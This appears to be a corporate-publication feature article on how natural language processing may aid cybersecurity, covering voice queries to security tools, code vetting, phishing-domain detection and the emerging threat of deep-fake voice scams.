Security & Risk

A new voice for cybersecurity

How natural language processing can help solve critical security challenges

NLP Security
  • 40% of large enterprises plan to adopt voice UIs in the next two years
  • Emerging NLP applications can help speed up threat detection and patch rollouts
  • Deep-fake voice UIs are an emerging security threat

Artificial intelligence is spreading quickly across the enterprise: AI applications are now part of the technology stack at 45% of companies with 1,000 or more employees, according to a recent survey.

One of the most promising AI applications is the voice assistant—software with natural language processing (NLP) capabilities that allow computers to understand spoken and written language. Nearly 4 in 10 enterprises plan to implement some form of voice UI in the next two years, according to 451 Research. That’s on top of the fast-growing consumer market for the technology: By 2023, people will be talking to nearly 8 billion digital voice assistants, according to Juniper Research.

For security analysts, NLP may soon enable requests such as, “Are there any alerts I that require human review?” Or, “Did the patch rollout succeed last night?”

While no case studies yet exist for NLP applications in cybersecurity, compelling applications are starting to emerge. Many CISOs are hoping these assistants will help security teams with basic patch maintenance and other critical needs. NLP promises to make cybersecurity tools easier to use. It should also help harden code, enable faster and more accurate threat detection, and provide insights into the minds of attackers.

“Security analysts have so much to focus on, so the ability to search is key,” says Chris Peake, global senior director of information security at ServiceNow, Workflow’s publisher. “Intelligent systems that leverage NLP and machine learning can help improve our awareness of the security environment, in the same way that a consumer voice assistant like Alexa can tell us the weather because it knows where we are.”

Here’s a look at some of the potential payoffs of NLP for cybersecurity.

Faster queries

The most basic role NLP and AI can play in fighting cybercrime will be powering a voice interface for existing security tools. Just as you might ask Alexa or Siri for a weather report or directions to the airport, security pros will be querying their security information and event management systems (SIEMs) by speaking instead of typing or tapping.

Some IT teams are already doing this in areas such as Wi-Fi management, where network managers troubleshoot issues using verbal queries, such as: “Do we have any failed connections?” or “Why is the network slow today?” For security analysts, NLP may soon enable similar requests: “Are there any alerts that require human review?” or “Did the patch rollout succeed last night?”

Understanding the unique data formats, APIs, and proprietary query languages used by modern security tools is more challenging than translating simple spoken language. But by simplifying the query process, NLP could lower barriers to entry in the profession and help alleviate the increasing shortage of skilled security personnel.


Enterprises that will implement some form of voice UI in the next two years

“NLP can help address the staffing shortages by making it easier to enter the security industry, and simultaneously improve users’ ability to quickly leverage and derive value from the tools they use every day,” says Pravin Kothari, CEO of data security firm CipherCloud.

More secure code

Once computers start to understand human syntax and the context in which it’s used, they can look for patterns within large data sets that would be difficult if not impossible for humans to detect. That has a number of potential security applications, says Eliezer Kanal, technical manager for cybersecurity foundations at Carnegie Mellon’s Software Engineering Institute.

For example, computers can use NLP to analyze reams of system documentation and flag potential vulnerabilities far more rapidly than a person can. NLP can also be used to debug code and make it more secure. Using source code that has already been vetted, “organizations can train a machine learning model to identify deviations from that code and suggest cleaner versions of it,” says Kanal.

Cleaner code usually results in fewer bugs, he adds, and limiting the number of bugs within an application reduces the potential vulnerabilities an attack could exploit.

Faster threat detection

One big challenge with threat detection is the need to analyze vast amounts of unstructured threat data. Computers were built for such large-scale, highly repetitive tasks, but first they need to understand what they’re looking at.

Some companies are using NLP to discover malicious language hidden inside otherwise benign code. By breaking code into discrete parts of speech and understanding how one part relates to another, researchers can treat subroutines as “sentences,” allowing them to uncover how a particular segment of code functions without the need to execute and analyze it.

Researchers are also using NLP to identify malicious domain names generated for use in phishing scams. One NLP-based algorithm developed by OpenDNS, called NLP-Rank, analyzes the number and types of edits required to change a legitimate domain into a false one, applying machine learning to identify patterns in how advanced persistent threat (APT) groups create URLs. This information can be used to quarantine network traffic containing the questionable domain names before it reaches anyone’s inbox.

More sophisticated attacks

As with any technology that aids with threat detection and assessing vulnerabilities, NLP can also be used to give attackers an advantage. For example, voice UIs can be used to generate deep-fake conversations that mimic company executives.

The first known case happened last March, when the CEO of a UK-based energy firm was scammed out of nearly $250,000 by attackers using AI-based voice spoofing to stage a phone conversation with his boss, the chief executive of his firm’s German parent company.

The same social engineering techniques can be used to bypass physical security precautions. Imagine a security guard who receives a phone call from a voice he trusts who tells him the person at the front gate is approved for entry.

Unfortunately, the burden is still on humans to detect these new types of attacks. “It’s generally easier for computers to generate language than to detect machine-generated language,” says Paul Bischoff, a privacy advocate with Comparitech. “Humans are still better at detecting fakes than computers. The problem is we can’t do it at scale.”